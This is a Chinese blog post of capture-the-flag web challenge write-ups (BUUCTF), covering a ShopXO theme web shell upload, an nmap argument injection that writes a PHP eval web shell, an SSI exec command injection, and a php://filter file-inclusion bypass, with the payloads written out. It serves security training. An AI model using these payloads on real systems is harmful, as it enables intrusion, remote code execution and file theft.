2020-08-10

最新推荐文章于 2022-10-20 18:15:33 发布
最新推荐文章于 2022-10-20 18:15:33 发布
阅读量181 收藏
点赞数
分类专栏: ctfweb buuctf刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Realiy/article/details/107903507
版权

9号是个懒狗没做题

[GKCTF2020]老八小超市儿

打开之后各种瞎点没有思路,大佬wp告诉我这种时候就要找管理后门,后门地址/admin.php,用户admin密码shopxo。

登录之后主题插马,先下载一个默认主题,将马插到里面再上传

之后从主页图片看到页面地址

http://8c45f2f9-5337-49d1-921b-2c712fe6aa66.node3.buuoj.cn/public/static/index/default/test.php

蚁剑连上

根目录找到 一个假的flag

然后看hint和auto.sh,看到auto.sh自动执行py文件打开看看

发现可以读取根目录,加上打开真flag的语句

之后在flag.hint看到flag

[网鼎杯 2020 朱雀组]Nmap

这题和之前online tool类似

直接传payload,这里传.php被过滤了于是传phtml

127.0.0.1 ' <?= @eval($_POST["ta3shi"]);?> -oG test.phtml '

试着连一下

成功,扫一下目录

拿flag

[BJDCTF2020]EasySearch

存在.swp泄露源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

验证密码的md5值前六位等于'6d0bc1'成功之后创建一个shtml文件地址存放在响应头里

写个验证密码的脚本

from hashlib import *
for i in range(1,100000000):
        if (md5(str(i)).hexdigest().startswith('6d0bc1')):
                print(i)

得到几个密码值,随便一个都可以

看到地址,然后这里username处存在ssi注入(引用自引用

(shtml是一种基于SSI技术的文件。SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。IIS和Apache都可以开启SSI功能)

(SSI注入的条件:

1.Web 服务器已支持SSI(服务器端包含)

2.Web 应用程序未对对相关SSI关键字做过滤

3.Web 应用程序在返回响应的HTML页面时,嵌入用户输入)

传入payload

<!--#exec cmd="find / -name 'flag*'"-->

得到

cat最后一个即可

[BSidesCF 2020]Had a bad day

试一下直接包含报错,试着

发现自动加了php

看看flag

多了一个但是没有什么用,试试读取源码

category=php://filter/convert.base64-encode/resource=index
<?php
$file = $_GET['category'];

if(isset($file))
{
if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
	include ($file . '.php');
	}
else{
    echo "Sorry, we currently only support woofers and meowers.";
	}
}
?>

那么最终payload,中间包含了一个index,第一次见到这种嵌套

category=php://filter/convert.base64-encode/index/resource=flag

解码得到flag

[BJDCTF 2nd]Schrödinger

翻译一下先(红字部分本来是白色的)

试一下输入http://127.0.0.1/test.php

check并抓包

发现cookie的dXNlcg经过base64解码是时间戳,改为dXNlcg=0发包

去b站找到这个视频翻几页,暴打出题人

 

ta3shi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]EasySearch
m0_62092622的博客
04-24 734
先扫描目录,发现.swp备份文件源码泄露(以后题目查询的文件又增加了一个) http://8cfe7f8c-22b7-43e1-8b5c-a71c5c0858d8.node4.buuoj.cn:81/index.php.swp 然后得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&amp..
BUU-WEB-[BJDCTF2020]EasySearch
qq_24033605的博客
05-19 395
[BJDCTF2020]EasySearch 扫描找到主页的备份源码。 index.php.swp 1.passwd的md5前6位是6d0bc1 2. 成功提交后生成一个shtml文件。(SSI远程命令执行) 爆破一下,看看有哪些md5的前六位符合。 import hashlib a = "0123456789" for o in a: for p in a: for q in a: for r in a: for s i
BUUCTF(10.25-11.1)
XINO
11-23 3609
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1991
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
[BUUCTF] 集训第五天
Dannie01的博客
10-02 528
[MRCTF2020]PYWebsite 查看源码 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829
ISSCC_PPT_2020-08.zip
03-04
标题中的“ISSCC_PPT_2020-08.zip”表明这是一份与2020年8月国际固态电路会议(International Solid-State Circuits Conference, 简称ISSCC)相关的PPT演示文稿压缩包。ISSCC是全球集成电路设计领域的顶级学术会议,...
2020-08-10-19-32-12-download-PPet-1.2.1.exe
08-11
安装此软件,桌面右下角会出现一个动漫画的人物图标,能够对一定的鼠标动作作出反应,有很强的自定义性,可以导入在线模型,插件,内置提供了多张人物图标和不同的衣服,可以供用户选择,为自己的桌面添加一点趣味。
2020-03-08
12-22
学习笔记之十七 函数的总结复习 函数的定义,调用 参数 可变参数 关键字参数 返回值 嵌套函数 闭包 装饰器 多层装饰器 ...open(patn\文件名,“rt-默认读取.txt文本”)…》返回值是stream (等效管道) ...
translation5:Translate5:开源翻译系统(第一次在github于2020-08-10发布)
02-25
开源翻译系统云翻译,审阅,后期编辑和术语平台translation5的使命是由社区驱动并持续开发语言行业的开源和基于云的翻译管理系统。 Translate5是由专业人员合作开发的。 我们作为翻译专家,语言研究人员和翻译软件...
BJD CTF web
0xdawn的博客
04-10 1075
Easy MD5 响应头里的hint告知了sql语句: select * from 'admin' where password=md5($pass,true) password=md5($pass,true) ffifdyop这个字符串被MD5哈希了之后会变成276f722736c95d99e921722cf9ed621c,而这个字符串开头刚好是' or '6,而Mysql会把hex转为asc...
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 559
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
BUUCTF刷题记录(4)
bmth666的博客
04-12 1412
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2754
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
第六十题——[BJDCTF2020]EasySearch
分享简单的安全技术
05-08 220
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,叫我们输入用户名与密码,使用dirsearch扫描出来index.php.swp目录,下载下来是源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt
代码审计后的SSI注入漏洞
qq_53142368的博客
11-19 3096
[BJDCTF2020]EasySearch 首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。 然后dirsearch就扫描出来了index;php.swp文件。。。 然后就看到了源码 进行代码审计 [<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#
春季?夏季?学习报告5.10(我的青春........在家里度过)
qq_45944336的博客
05-10 217
本周学习的主要内容是 部分PHP函数和竞赛题 听说好像大一的不开学?????? 或者是只待一个月就回来????? emmmm那我有点心疼车票钱了。。。 而且要么在线“考试”(copy)大家都过,要么现在开学,还有一个多月抢救一下,不然如果一到学校就考试,再怎么放水一个班至少得挂15个… 行吧,废话少说 1PHP函数(主要还是为后面的竞赛题做准备) 说道php又得一提,就是学的PHP·和比赛要考的php完全不是一个东西好吗… 照着教程学习,除了理顺思路,看得懂大概过程之外,很多东西压根就学不到,比如说下面这一
将 Date 类型2020-06-08 00:00:00 的结果截取为 2020-06-08 类型依旧是Date
最新发布
06-09
将 Date 类型的时间戳 "2020-06-08 00:00:00" 转换为 "2020-06-08" 的字符串格式,可以使用 SimpleDateFormat 对象来实现。示例代码如下: ```java // 原始的时间戳 Date date = new Date("2020-06-08 00:00:00"); // 定义转换的格式 SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd"); // 将时间戳转换为字符串格式 String dateString = sdf.format(date); // 输出转换后的字符串格式 System.out.println(dateString); ``` 输出结果为: ``` 2020-06-08 ``` 需要注意的是,转换后的字符串格式并不是 Date 类型,而是 String 类型。如果您需要在程序中继续使用 Date 类型,可以通过 SimpleDateFormat 对象将字符串格式转换为 Date 类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值